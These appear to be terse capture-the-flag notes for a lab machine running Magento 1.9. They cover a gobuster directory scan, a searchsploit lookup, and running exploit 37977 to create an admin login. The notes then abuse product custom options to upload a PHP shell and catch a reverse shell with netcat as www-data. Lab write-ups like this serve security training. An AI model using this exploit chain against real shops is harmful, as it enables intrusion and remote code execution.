2 :80
$ gobuster dir -u 10.10.10.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,html,txt
===============================================================
/index.php (Status: 200) [Size: 16097]
/media (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/includes (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/lib (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/install.php (Status: 200) [Size: 44]
/app (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]
/js (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/api.php (Status: 200) [Size: 37]
/shell (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/cron.php (Status: 200) [Size: 0]
/LICENSE.html (Status: 200) [Size: 10679]
/LICENSE.txt (Status: 200) [Size: 10410]
/var (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
/errors (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]
/mage (Status: 200) [Size: 1319]
$ searchsploit magento
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
Magento eCommerce - Remote Code Execution | xml/webapps/37977.py
Update target to http://10.10.10.140/index.php
$ python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds kashz1:kashz1
Magento ver. 1.9.0.0
Tried using https://www.exploit-db.com/exploits/37811; did not work.
Catalog > Manage Products > Select a product > Edit > Custom Options > Add New Option
Input Type = File
Allowed File Extensions = .php
Save
Go to product page, select shell.php and add to cart > file is uploaded.
http://10.10.10.140/media/custom_options/quote/<RANDOM-PATH>
$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.140] 57270
SOCKET: Shell has connected! PID: 1969
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Last updated